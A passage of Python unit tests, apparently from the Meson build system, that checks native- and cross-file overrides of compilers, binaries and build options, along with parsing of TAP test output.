parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
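# The fifo is filled from a background thread because opening a fifo for
# writing blocks until the reader (meson, during init) opens it.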
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We may not have python2 installed, so check for it first
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that at the moment, so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Find the werror option and check its value
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Integers are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Find the unity_size option and check its value
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find cpp_std in build options?')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that non-per-subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all four expected options')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn('Parent should override default_library', cm.exception.stdout)
def test_builtin_options_subprojects_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn('Parent should override default_library', cm.exception.stdout)
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed at testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the tests,
# this test will fail, so mock the environment, pop it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
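# For illustration, helper_create_cross_file({'binaries': {'c': '/usr/bin/cc'},
# 'built-in options': {'cpp_std': 'c++14'}}) writes a file shaped like:
#
# [binaries]
# c='/usr/bin/cc'
# [built-in options]
# cpp_std='c++14'
#
# Every value is written single-quoted, so non-string values would need a
# helper that quotes them appropriately.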
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a smoke test for the cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any option
that can be set for both machines would do.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/dir'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
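# The snippets below exercise the TAP grammar the parser understands: a plan
# line ('1..N', optionally with a '# skip ...' or '# todo ...' directive),
# test lines ('ok' / 'not ok' with optional number, name, and '# SKIP' /
# '# TODO' directive plus explanation), 'Bail out!' lines, '# ...' diagnostics,
# and an optional 'TAP version 13' header, which enables indented YAML blocks.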
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
